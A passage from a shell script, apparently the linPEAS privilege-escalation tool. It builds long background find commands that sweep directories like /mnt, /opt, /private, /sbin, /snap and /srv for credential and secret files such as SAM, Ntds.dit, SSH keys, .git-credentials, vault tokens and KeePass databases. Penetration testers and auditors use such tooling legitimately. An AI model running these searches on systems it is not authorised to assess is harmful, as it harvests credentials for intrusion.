\"ffftp.ini\" -o -name \"mongod*.conf\" -o -name \"racoon.conf\" -o -name \"pgsql.conf\" -o -name \"*vnc*.txt\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"accessTokens.json\" -o -name \"*.jks\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"*.timer\" -o -name \"https.conf\" -o -name \"*.key\" -o -name \".wgetrc\" -o -name \"NetSetup.log\" -o -name \"rsyncd.secrets\" -o -name \"pgadmin*.db\" -o -name \"psk.txt\" -o -name \"*.pem\" -o -name \"snmpd.conf\" -o -name \"ftp.ini\" -o -name \"*.ovpn\" -o -name \".github\" -o -name \"wsl.exe\" -o -name \"ConsoleHost_history.txt\" -o -name \".bashrc\" -o -name \"*.keystore\" -o -name \".k5login\" -o -name \"bash.exe\" -o -name \"appcmd.exe\" -o -name \"supervisord.conf\" -o -name \".profile\" -o -name \"sysprep.inf\" -o -name \"ws_ftp.ini\" -o -name \"*.sqlite\" -o -name \"*.keyring\" -o -name \"*.kdbx\" -o -name \".htpasswd\" -o -name \"*.psk\" -o -name \"unattended.xml\" -o -name \".msmtprc\" -o -name \"sentry.conf.py\" -o -name \"anaconda-ks.cfg\" -o -name \"https-xampp.conf\" -o -name \"KeePass.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MNT=`eval_bckgrd "find /mnt -name \"groups.xml\" -o -name \"cloud.cfg\" -o -name \"*.crt\" -o -name \"*.cer\" -o -name \"autologin\" -o -name \"error.log\" -o -name \"printers.xml\" -o -name \"credentials\" -o -name \"fastcgi_params\" -o -name \"wcx_ftp.ini\" -o -name \"backups\" -o -name \"*vnc*.xml\" -o -name \"my.cnf\" -o -name \"influxdb.conf\" -o -name \"hosts.equiv\" -o -name \"creds*\" -o -name \"*.socket\" -o -name \"gvm-tools.conf\" -o -name \"*.pgp\" -o -name \"access_tokens.json\" -o -name \"tomcat-users.xml\" -o -name \"*.sqlite3\" -o -name \"zabbix_server.conf\" -o -name \"*_history*\" -o -name \"SecEvent.Evt\" -o -name \"kcpassword\" -o -name \"docker-compose.yml\" -o -name \"my.ini\" -o -name \".git-credentials\" -o -name \"authorized_keys\" -o -name \"authorized_hosts\" -o -name \"sitemanager.xml\" -o -name \"pg_hba.conf\" -o -name \".vault-token\" -o -name \"secrets.yml\" -o -name \"*.p12\" -o -name \"filezilla.xml\" -o -name \"RDCMan.settings\" -o -name \"secrets.ldb\" -o -name \"ntuser.dat\" -o -name \"system.sav\" -o -name \"software\" -o -name \".ldaprc\" -o -name \"TokenCache.dat\" -o -name \"server.xml\" -o -name \"legacy_credentials.db\" -o -name \"security.sav\" -o -name \"default.sav\" -o -name \"sssd.conf\" -o -name \"rsyncd.conf\" -o -name \"*.swp\" -o -name \"httpd.conf\" -o -name \"redis.conf\" -o -name \"credentials.db\" -o -name \"unattend.inf\" -o -name \"ipsec.secrets\" -o -name \".pypirc\" -o -name \"*password*\" -o -name \".google_authenticator\" -o -name \"*.service\" -o -name \"KeePass.config*\" -o -name \"sites.ini\" -o -name \"unattend.txt\" -o -name \"setupinfo.bak\" -o -name \"pagefile.sys\" -o -name \"kibana.y*ml\" -o -name \"zabbix_agentd.conf\" -o -name \"db.php\" -o -name \"ddclient.conf\" -o -name \"*.ftpconfig\" -o -name \"debian.cnf\" -o -name \"datasources.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"known_hosts\" -o -name \"*.gnupg\" -o -name \"iis6.log\" -o -name \"*vnc*.ini\" -o -name \".plan\" -o -name \".rhosts\" -o -name \"000-default.conf\" -o -name \"*config*.php\" -o -name \".env\" -o -name \"*.csr\" -o -name \"index.dat\" -o -name \"gitlab.rm\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"jetty-realm.properties\" -o -name \".git\" -o -name \"unattend.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"passwd\" -o -name \"storage.php\" -o -name \"autologin.conf\" -o -name \"gitlab.yml\" -o -name \"web*.config\" -o -name \"mariadb.cnf\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"backup\" -o -name \".recently-used.xbel\" -o -name \"sysprep.xml\" -o -name \"id_rsa*\" -o -name \"*.der\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \"postgresql.conf\" -o -name \"passbolt.php\" -o -name \"FreeSSHDservice.ini\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"access.log\" -o -name \".lesshst\" -o -name \"*credential*\" -o -name \"azureProfile.json\" -o -name \"SYSTEM\" -o -name \"vault-ssh-helper.hcl\" -o -name \"hostapd.conf\" -o -name \"setupinfo\" -o -name \"wp-config.php\" -o -name \".secrets.mkey\" -o -name \"krb5.conf\" -o -name \"Ntds.dit\" -o -name \"*.viminfo\" -o -name \"Dockerfile\" -o -name \"mosquitto.conf\" -o -name \"scheduledtasks.xml\" -o -name \"settings.php\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"*.rdg\" -o -name \"recentservers.xml\" -o -name \"php.ini\" -o -name \"AzureRMContext.json\" -o -name \"ipsec.conf\" -o -name \"*.pfx\" -o -name \"docker.sock\" -o -name \"id_dsa*\" -o -name \".gitconfig\" -o -name \"winscp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"ffftp.ini\" -o -name \"mongod*.conf\" -o -name \"racoon.conf\" -o -name \"pgsql.conf\" -o -name \"*vnc*.txt\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"accessTokens.json\" -o -name \"*.jks\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"*.timer\" -o -name \"https.conf\" -o -name \"*.key\" -o -name \".wgetrc\" -o -name \"NetSetup.log\" -o -name \"rsyncd.secrets\" -o -name \"pgadmin*.db\" -o -name \"psk.txt\" -o -name \"*.pem\" -o -name \"snmpd.conf\" -o -name \"ftp.ini\" -o -name \"*.ovpn\" -o -name \".github\" -o -name \"wsl.exe\" -o -name \"ConsoleHost_history.txt\" -o -name \".bashrc\" -o -name \"*.keystore\" -o -name \".k5login\" -o -name \"bash.exe\" -o -name \"appcmd.exe\" -o -name \"supervisord.conf\" -o -name \".profile\" -o -name \"sysprep.inf\" -o -name \"ws_ftp.ini\" -o -name \"*.sqlite\" -o -name \"*.keyring\" -o -name \"*.kdbx\" -o -name \".htpasswd\" -o -name \"*.psk\" -o -name \"unattended.xml\" -o -name \".msmtprc\" -o -name \"sentry.conf.py\" -o -name \"anaconda-ks.cfg\" -o -name \"https-xampp.conf\" -o -name \"KeePass.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_OPT=`eval_bckgrd "find /opt -name \"groups.xml\" -o -name \"cloud.cfg\" -o -name \"*.crt\" -o -name \"*.cer\" -o -name \"autologin\" -o -name \"error.log\" -o -name \"printers.xml\" -o -name \"credentials\" -o -name \"fastcgi_params\" -o -name \"wcx_ftp.ini\" -o -name \"backups\" -o -name \"*vnc*.xml\" -o -name \"my.cnf\" -o -name \"influxdb.conf\" -o -name \"hosts.equiv\" -o -name \"creds*\" -o -name \"*.socket\" -o -name \"gvm-tools.conf\" -o -name \"*.pgp\" -o -name \"access_tokens.json\" -o -name \"tomcat-users.xml\" -o -name \"*.sqlite3\" -o -name \"zabbix_server.conf\" -o -name \"*_history*\" -o -name \"SecEvent.Evt\" -o -name \"kcpassword\" -o -name \"docker-compose.yml\" -o -name \"my.ini\" -o -name \".git-credentials\" -o -name \"authorized_keys\" -o -name \"authorized_hosts\" -o -name \"sitemanager.xml\" -o -name \"pg_hba.conf\" -o -name \".vault-token\" -o -name \"secrets.yml\" -o -name \"*.p12\" -o -name \"filezilla.xml\" -o -name \"RDCMan.settings\" -o -name \"secrets.ldb\" -o -name \"ntuser.dat\" -o -name \"system.sav\" -o -name \"software\" -o -name \".ldaprc\" -o -name \"TokenCache.dat\" -o -name \"server.xml\" -o -name \"legacy_credentials.db\" -o -name \"security.sav\" -o -name \"default.sav\" -o -name \"sssd.conf\" -o -name \"rsyncd.conf\" -o -name \"*.swp\" -o -name \"httpd.conf\" -o -name \"redis.conf\" -o -name \"credentials.db\" -o -name \"unattend.inf\" -o -name \"ipsec.secrets\" -o -name \".pypirc\" -o -name \"*password*\" -o -name \".google_authenticator\" -o -name \"*.service\" -o -name \"KeePass.config*\" -o -name \"sites.ini\" -o -name \"unattend.txt\" -o -name \"setupinfo.bak\" -o -name \"pagefile.sys\" -o -name \"kibana.y*ml\" -o -name \"zabbix_agentd.conf\" -o -name \"db.php\" -o -name \"ddclient.conf\" -o -name \"*.ftpconfig\" -o -name \"debian.cnf\" -o -name \"datasources.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"known_hosts\" -o -name \"*.gnupg\" -o -name \"iis6.log\" -o -name \"*vnc*.ini\" -o -name \".plan\" -o -name \".rhosts\" -o -name \"000-default.conf\" -o -name \"*config*.php\" -o -name \".env\" -o -name \"*.csr\" -o -name \"index.dat\" -o -name \"gitlab.rm\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"jetty-realm.properties\" -o -name \".git\" -o -name \"unattend.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"passwd\" -o -name \"storage.php\" -o -name \"autologin.conf\" -o -name \"gitlab.yml\" -o -name \"web*.config\" -o -name \"mariadb.cnf\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"backup\" -o -name \".recently-used.xbel\" -o -name \"sysprep.xml\" -o -name \"id_rsa*\" -o -name \"*.der\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \"postgresql.conf\" -o -name \"passbolt.php\" -o -name \"FreeSSHDservice.ini\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"KeePass.enforced*\" -o -name \"access.log\" -o -name \".lesshst\" -o -name \"*credential*\" -o -name \"azureProfile.json\" -o -name \"SYSTEM\" -o -name \"vault-ssh-helper.hcl\" -o -name \"hostapd.conf\" -o -name \"setupinfo\" -o -name \"wp-config.php\" -o -name \".secrets.mkey\" -o -name \"krb5.conf\" -o -name \"Ntds.dit\" -o -name \"*.viminfo\" -o -name \"Dockerfile\" -o -name \"mosquitto.conf\" -o -name \"scheduledtasks.xml\" -o -name \"settings.php\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"*.rdg\" -o -name \"recentservers.xml\" -o -name \"php.ini\" -o -name \"AzureRMContext.json\" -o -name \"ipsec.conf\" -o -name \"*.pfx\" -o -name \"docker.sock\" -o -name \"id_dsa*\" -o -name \".gitconfig\" -o -name \"winscp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"ffftp.ini\" -o -name \"mongod*.conf\" -o -name \"racoon.conf\" -o -name \"pgsql.conf\" -o -name \"*vnc*.txt\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"accessTokens.json\" -o -name \"*.jks\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"*.timer\" -o -name \"https.conf\" -o -name \"*.key\" -o -name \".wgetrc\" -o -name \"NetSetup.log\" -o -name \"rsyncd.secrets\" -o -name \"pgadmin*.db\" -o -name \"psk.txt\" -o -name \"*.pem\" -o -name \"snmpd.conf\" -o -name \"ftp.ini\" -o -name \"*.ovpn\" -o -name \".github\" -o -name \"wsl.exe\" -o -name \"ConsoleHost_history.txt\" -o -name \".bashrc\" -o -name \"*.keystore\" -o -name \".k5login\" -o -name \"bash.exe\" -o -name \"appcmd.exe\" -o -name \"supervisord.conf\" -o -name \".profile\" -o -name \"sysprep.inf\" -o -name \"ws_ftp.ini\" -o -name \"*.sqlite\" -o -name \"*.keyring\" -o -name \"*.kdbx\" -o -name \".htpasswd\" -o -name \"*.psk\" -o -name \"unattended.xml\" -o -name \".msmtprc\" -o -name \"sentry.conf.py\" -o -name \"anaconda-ks.cfg\" -o -name \"https-xampp.conf\" -o -name \"KeePass.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_PRIVATE=`eval_bckgrd "find /private -name \"groups.xml\" -o -name \"cloud.cfg\" -o -name \"*.crt\" -o -name \"*.cer\" -o -name \"autologin\" -o -name \"error.log\" -o -name \"printers.xml\" -o -name \"credentials\" -o -name \"fastcgi_params\" -o -name \"wcx_ftp.ini\" -o -name \"backups\" -o -name \"*vnc*.xml\" -o -name \"my.cnf\" -o -name \"influxdb.conf\" -o -name \"hosts.equiv\" -o -name \"creds*\" -o -name \"*.socket\" -o -name \"gvm-tools.conf\" -o -name \"*.pgp\" -o -name \"access_tokens.json\" -o -name \"tomcat-users.xml\" -o -name \"*.sqlite3\" -o -name \"zabbix_server.conf\" -o -name \"*_history*\" -o -name \"SecEvent.Evt\" -o -name \"kcpassword\" -o -name \"docker-compose.yml\" -o -name \"my.ini\" -o -name \".git-credentials\" -o -name \"authorized_keys\" -o -name \"authorized_hosts\" -o -name \"sitemanager.xml\" -o -name \"pg_hba.conf\" -o -name \".vault-token\" -o -name \"secrets.yml\" -o -name \"*.p12\" -o -name \"filezilla.xml\" -o -name \"RDCMan.settings\" -o -name \"secrets.ldb\" -o -name \"ntuser.dat\" -o -name \"agent*\" -o -name \"system.sav\" -o -name \"software\" -o -name \".ldaprc\" -o -name \"TokenCache.dat\" -o -name \"server.xml\" -o -name \"legacy_credentials.db\" -o -name \"security.sav\" -o -name \"default.sav\" -o -name \"sssd.conf\" -o -name \"rsyncd.conf\" -o -name \"*.swp\" -o -name \"httpd.conf\" -o -name \"redis.conf\" -o -name \"credentials.db\" -o -name \"unattend.inf\" -o -name \"ipsec.secrets\" -o -name \".pypirc\" -o -name \"*password*\" -o -name \".google_authenticator\" -o -name \"*.service\" -o -name \"KeePass.config*\" -o -name \"sites.ini\" -o -name \"unattend.txt\" -o -name \"setupinfo.bak\" -o -name \"pagefile.sys\" -o -name \"kibana.y*ml\" -o -name \"zabbix_agentd.conf\" -o -name \"db.php\" -o -name \"ddclient.conf\" -o -name \"*.ftpconfig\" -o -name \"debian.cnf\" -o -name \"datasources.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"known_hosts\" -o -name \"*.gnupg\" -o -name \"iis6.log\" -o -name \"*vnc*.ini\" -o -name \".plan\" -o -name \".rhosts\" -o -name \"000-default.conf\" -o -name \"*config*.php\" -o -name \".env\" -o -name \"*.csr\" -o -name \"index.dat\" -o -name \"gitlab.rm\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"jetty-realm.properties\" -o -name \".git\" -o -name \"unattend.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"passwd\" -o -name \"storage.php\" -o -name \"autologin.conf\" -o -name \"gitlab.yml\" -o -name \"web*.config\" -o -name \"mariadb.cnf\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"backup\" -o -name \".recently-used.xbel\" -o -name \"sysprep.xml\" -o -name \"id_rsa*\" -o -name \"*.der\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \"postgresql.conf\" -o -name \"passbolt.php\" -o -name \"FreeSSHDservice.ini\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"access.log\" -o -name \".lesshst\" -o -name \"*credential*\" -o -name \"azureProfile.json\" -o -name \"SYSTEM\" -o -name \"vault-ssh-helper.hcl\" -o -name \"hostapd.conf\" -o -name \"setupinfo\" -o -name \"wp-config.php\" -o -name \".secrets.mkey\" -o -name \"krb5.conf\" -o -name \"Ntds.dit\" -o -name \"*.viminfo\" -o -name \"Dockerfile\" -o -name \"mosquitto.conf\" -o -name \"scheduledtasks.xml\" -o -name \"settings.php\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"*.rdg\" -o -name \"recentservers.xml\" -o -name \"php.ini\" -o -name \"AzureRMContext.json\" -o -name \"ipsec.conf\" -o -name \"*.pfx\" -o -name \"docker.sock\" -o -name \"id_dsa*\" -o -name \".gitconfig\" -o -name \"winscp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"ffftp.ini\" -o -name \"mongod*.conf\" -o -name \"racoon.conf\" -o -name \"pgsql.conf\" -o -name \"*vnc*.txt\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"accessTokens.json\" -o -name \"*.jks\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"*.timer\" -o -name \"https.conf\" -o -name \"*.key\" -o -name \".wgetrc\" -o -name \"NetSetup.log\" -o -name \"rsyncd.secrets\" -o -name \"pgadmin*.db\" -o -name \"psk.txt\" -o -name \"*.pem\" -o -name \"snmpd.conf\" -o -name \"ftp.ini\" -o -name \"*.ovpn\" -o -name \".github\" -o -name \"wsl.exe\" -o -name \"ConsoleHost_history.txt\" -o -name \".bashrc\" -o -name \"*.keystore\" -o -name \".k5login\" -o -name \"bash.exe\" -o -name \"appcmd.exe\" -o -name \"supervisord.conf\" -o -name \".profile\" -o -name \"sysprep.inf\" -o -name \"ws_ftp.ini\" -o -name \"*.sqlite\" -o -name \"*.keyring\" -o -name \"*.kdbx\" -o -name \".htpasswd\" -o -name \"*.psk\" -o -name \"unattended.xml\" -o -name \".msmtprc\" -o -name \"sentry.conf.py\" -o -name \"anaconda-ks.cfg\" -o -name \"https-xampp.conf\" -o -name \"KeePass.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_RUN=`eval_bckgrd "find /run -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SBIN=`eval_bckgrd "find /sbin -name \"groups.xml\" -o -name \"cloud.cfg\" -o -name \"*.crt\" -o -name \"*.cer\" -o -name \"autologin\" -o -name \"error.log\" -o -name \"printers.xml\" -o -name \"credentials\" -o -name \"fastcgi_params\" -o -name \"wcx_ftp.ini\" -o -name \"backups\" -o -name \"*vnc*.xml\" -o -name \"my.cnf\" -o -name \"influxdb.conf\" -o -name \"hosts.equiv\" -o -name \"creds*\" -o -name \"*.socket\" -o -name \"gvm-tools.conf\" -o -name \"*.pgp\" -o -name \"access_tokens.json\" -o -name \"tomcat-users.xml\" -o -name \"*.sqlite3\" -o -name \"zabbix_server.conf\" -o -name \"*_history*\" -o -name \"SecEvent.Evt\" -o -name \"kcpassword\" -o -name \"docker-compose.yml\" -o -name \"my.ini\" -o -name \".git-credentials\" -o -name \"authorized_keys\" -o -name \"authorized_hosts\" -o -name \"sitemanager.xml\" -o -name \"pg_hba.conf\" -o -name \".vault-token\" -o -name \"secrets.yml\" -o -name \"*.p12\" -o -name \"filezilla.xml\" -o -name \"RDCMan.settings\" -o -name \"secrets.ldb\" -o -name \"ntuser.dat\" -o -name \"system.sav\" -o -name \"software\" -o -name \".ldaprc\" -o -name \"TokenCache.dat\" -o -name \"server.xml\" -o -name \"legacy_credentials.db\" -o -name \"security.sav\" -o -name \"default.sav\" -o -name \"sssd.conf\" -o -name \"rsyncd.conf\" -o -name \"*.swp\" -o -name \"httpd.conf\" -o -name \"redis.conf\" -o -name \"credentials.db\" -o -name \"unattend.inf\" -o -name \"ipsec.secrets\" -o -name \".pypirc\" -o -name \"*password*\" -o -name \".google_authenticator\" -o -name \"*.service\" -o -name \"KeePass.config*\" -o -name \"sites.ini\" -o -name \"unattend.txt\" -o -name \"setupinfo.bak\" -o -name \"pagefile.sys\" -o -name \"kibana.y*ml\" -o -name \"zabbix_agentd.conf\" -o -name \"db.php\" -o -name \"ddclient.conf\" -o -name \"*.ftpconfig\" -o -name \"debian.cnf\" -o -name \"datasources.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"known_hosts\" -o -name \"*.gnupg\" -o -name \"iis6.log\" -o -name \"*vnc*.ini\" -o -name \".plan\" -o -name \".rhosts\" -o -name \"000-default.conf\" -o -name \"*config*.php\" -o -name \".env\" -o -name \"*.csr\" -o -name \"index.dat\" -o -name \"gitlab.rm\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"jetty-realm.properties\" -o -name \".git\" -o -name \"unattend.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"passwd\" -o -name \"storage.php\" -o -name \"autologin.conf\" -o -name \"gitlab.yml\" -o -name \"web*.config\" -o -name \"mariadb.cnf\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"backup\" -o -name \".recently-used.xbel\" -o -name \"sysprep.xml\" -o -name \"id_rsa*\" -o -name \"*.der\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \"postgresql.conf\" -o -name \"passbolt.php\" -o -name \"FreeSSHDservice.ini\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"KeePass.enforced*\" -o -name \"access.log\" -o -name \".lesshst\" -o -name \"*credential*\" -o -name \"azureProfile.json\" -o -name \"SYSTEM\" -o -name \"vault-ssh-helper.hcl\" -o -name \"hostapd.conf\" -o -name \"setupinfo\" -o -name \"wp-config.php\" -o -name \".secrets.mkey\" -o -name \"krb5.conf\" -o -name \"Ntds.dit\" -o -name \"*.viminfo\" -o -name \"Dockerfile\" -o -name \"mosquitto.conf\" -o -name \"scheduledtasks.xml\" -o -name \"settings.php\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"*.rdg\" -o -name \"recentservers.xml\" -o -name \"php.ini\" -o -name \"AzureRMContext.json\" -o -name \"ipsec.conf\" -o -name \"*.pfx\" -o -name \"docker.sock\" -o -name \"id_dsa*\" -o -name \".gitconfig\" -o -name \"winscp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"ffftp.ini\" -o -name \"mongod*.conf\" -o -name \"racoon.conf\" -o -name \"pgsql.conf\" -o -name \"*vnc*.txt\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"accessTokens.json\" -o -name \"*.jks\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"*.timer\" -o -name \"https.conf\" -o -name \"*.key\" -o -name \".wgetrc\" -o -name \"NetSetup.log\" -o -name \"rsyncd.secrets\" -o -name \"pgadmin*.db\" -o -name \"psk.txt\" -o -name \"*.pem\" -o -name \"snmpd.conf\" -o -name \"ftp.ini\" -o -name \"*.ovpn\" -o -name \".github\" -o -name \"wsl.exe\" -o -name \"ConsoleHost_history.txt\" -o -name \".bashrc\" -o -name \"*.keystore\" -o -name \".k5login\" -o -name \"bash.exe\" -o -name \"appcmd.exe\" -o -name \"supervisord.conf\" -o -name \".profile\" -o -name \"sysprep.inf\" -o -name \"ws_ftp.ini\" -o -name \"*.sqlite\" -o -name \"*.keyring\" -o -name \"*.kdbx\" -o -name \".htpasswd\" -o -name \"*.psk\" -o -name \"unattended.xml\" -o -name \".msmtprc\" -o -name \"sentry.conf.py\" -o -name \"anaconda-ks.cfg\" -o -name \"https-xampp.conf\" -o -name \"KeePass.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SNAP=`eval_bckgrd "find /snap -name \"groups.xml\" -o -name \"cloud.cfg\" -o -name \"*.crt\" -o -name \"*.cer\" -o -name \"autologin\" -o -name \"error.log\" -o -name \"printers.xml\" -o -name \"credentials\" -o -name \"fastcgi_params\" -o -name \"wcx_ftp.ini\" -o -name \"backups\" -o -name \"*vnc*.xml\" -o -name \"my.cnf\" -o -name \"influxdb.conf\" -o -name \"hosts.equiv\" -o -name \"creds*\" -o -name \"*.socket\" -o -name \"gvm-tools.conf\" -o -name \"*.pgp\" -o -name \"access_tokens.json\" -o -name \"tomcat-users.xml\" -o -name \"*.sqlite3\" -o -name \"zabbix_server.conf\" -o -name \"*_history*\" -o -name \"SecEvent.Evt\" -o -name \"kcpassword\" -o -name \"docker-compose.yml\" -o -name \"my.ini\" -o -name \".git-credentials\" -o -name \"authorized_keys\" -o -name \"authorized_hosts\" -o -name \"sitemanager.xml\" -o -name \"pg_hba.conf\" -o -name \".vault-token\" -o -name \"secrets.yml\" -o -name \"*.p12\" -o -name \"filezilla.xml\" -o -name \"RDCMan.settings\" -o -name \"secrets.ldb\" -o -name \"ntuser.dat\" -o -name \"system.sav\" -o -name \"software\" -o -name \".ldaprc\" -o -name \"TokenCache.dat\" -o -name \"server.xml\" -o -name \"legacy_credentials.db\" -o -name \"security.sav\" -o -name \"default.sav\" -o -name \"sssd.conf\" -o -name \"rsyncd.conf\" -o -name \"*.swp\" -o -name \"httpd.conf\" -o -name \"redis.conf\" -o -name \"credentials.db\" -o -name \"unattend.inf\" -o -name \"ipsec.secrets\" -o -name \".pypirc\" -o -name \"*password*\" -o -name \".google_authenticator\" -o -name \"*.service\" -o -name \"KeePass.config*\" -o -name \"sites.ini\" -o -name \"unattend.txt\" -o -name \"setupinfo.bak\" -o -name \"pagefile.sys\" -o -name \"kibana.y*ml\" -o -name \"zabbix_agentd.conf\" -o -name \"db.php\" -o -name \"ddclient.conf\" -o -name \"*.ftpconfig\" -o -name \"debian.cnf\" -o -name \"datasources.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"known_hosts\" -o -name \"*.gnupg\" -o -name \"iis6.log\" -o -name \"*vnc*.ini\" -o -name \".plan\" -o -name \".rhosts\" -o -name \"000-default.conf\" -o -name \"*config*.php\" -o -name \".env\" -o -name \"*.csr\" -o -name \"index.dat\" -o -name \"gitlab.rm\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"jetty-realm.properties\" -o -name \".git\" -o -name \"unattend.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"passwd\" -o -name \"storage.php\" -o -name \"autologin.conf\" -o -name \"gitlab.yml\" -o -name \"web*.config\" -o -name \"mariadb.cnf\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"backup\" -o -name \".recently-used.xbel\" -o -name \"sysprep.xml\" -o -name \"id_rsa*\" -o -name \"*.der\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \"postgresql.conf\" -o -name \"passbolt.php\" -o -name \"FreeSSHDservice.ini\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"KeePass.enforced*\" -o -name \"access.log\" -o -name \".lesshst\" -o -name \"*credential*\" -o -name \"azureProfile.json\" -o -name \"SYSTEM\" -o -name \"vault-ssh-helper.hcl\" -o -name \"hostapd.conf\" -o -name \"setupinfo\" -o -name \"wp-config.php\" -o -name \".secrets.mkey\" -o -name \"krb5.conf\" -o -name \"Ntds.dit\" -o -name \"*.viminfo\" -o -name \"Dockerfile\" -o -name \"mosquitto.conf\" -o -name \"scheduledtasks.xml\" -o -name \"settings.php\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"*.rdg\" -o -name \"recentservers.xml\" -o -name \"php.ini\" -o -name \"AzureRMContext.json\" -o -name \"ipsec.conf\" -o -name \"*.pfx\" -o -name \"docker.sock\" -o -name \"id_dsa*\" -o -name \".gitconfig\" -o -name \"winscp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"ffftp.ini\" -o -name \"mongod*.conf\" -o -name \"racoon.conf\" -o -name \"pgsql.conf\" -o -name \"*vnc*.txt\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"accessTokens.json\" -o -name \"*.jks\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"*.timer\" -o -name \"https.conf\" -o -name \"*.key\" -o -name \".wgetrc\" -o -name \"NetSetup.log\" -o -name \"rsyncd.secrets\" -o -name \"pgadmin*.db\" -o -name \"psk.txt\" -o -name \"*.pem\" -o -name \"snmpd.conf\" -o -name \"ftp.ini\" -o -name \"*.ovpn\" -o -name \".github\" -o -name \"wsl.exe\" -o -name \"ConsoleHost_history.txt\" -o -name \".bashrc\" -o -name \"*.keystore\" -o -name \".k5login\" -o -name \"bash.exe\" -o -name \"appcmd.exe\" -o -name \"supervisord.conf\" -o -name \".profile\" -o -name \"sysprep.inf\" -o -name \"ws_ftp.ini\" -o -name \"*.sqlite\" -o -name \"*.keyring\" -o -name \"*.kdbx\" -o -name \".htpasswd\" -o -name \"*.psk\" -o -name \"unattended.xml\" -o -name \".msmtprc\" -o -name \"sentry.conf.py\" -o -name \"anaconda-ks.cfg\" -o -name \"https-xampp.conf\" -o -name \"KeePass.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SRV=`eval_bckgrd "find /srv -name \"groups.xml\" -o -name \"cloud.cfg\" -o -name \"*.crt\" -o -name \"*.cer\" -o -name \"autologin\" -o -name \"error.log\" -o -name \"printers.xml\" -o -name \"credentials\" -o -name \"fastcgi_params\" -o -name \"wcx_ftp.ini\" -o -name \"backups\" -o -name \"*vnc*.xml\" -o -name \"my.cnf\" -o -name \"influxdb.conf\" -o -name \"hosts.equiv\" -o -name \"creds*\" -o -name \"*.socket\" -o -name \"gvm-tools.conf\" -o -name \"*.pgp\" -o -name \"access_tokens.json\" -o -name \"tomcat-users.xml\" -o -name \"*.sqlite3\" -o -name \"zabbix_server.conf\" -o -name \"*_history*\" -o -name \"SecEvent.Evt\" -o -name \"kcpassword\" -o -name \"docker-compose.yml\" -o -name \"my.ini\" -o -name \".git-credentials\" -o -name \"authorized_keys\" -o -name \"authorized_hosts\" -o -name \"sitemanager.xml\" -o -name \"pg_hba.conf\" -o -name \".vault-token\" -o -name \"secrets.yml\" -o 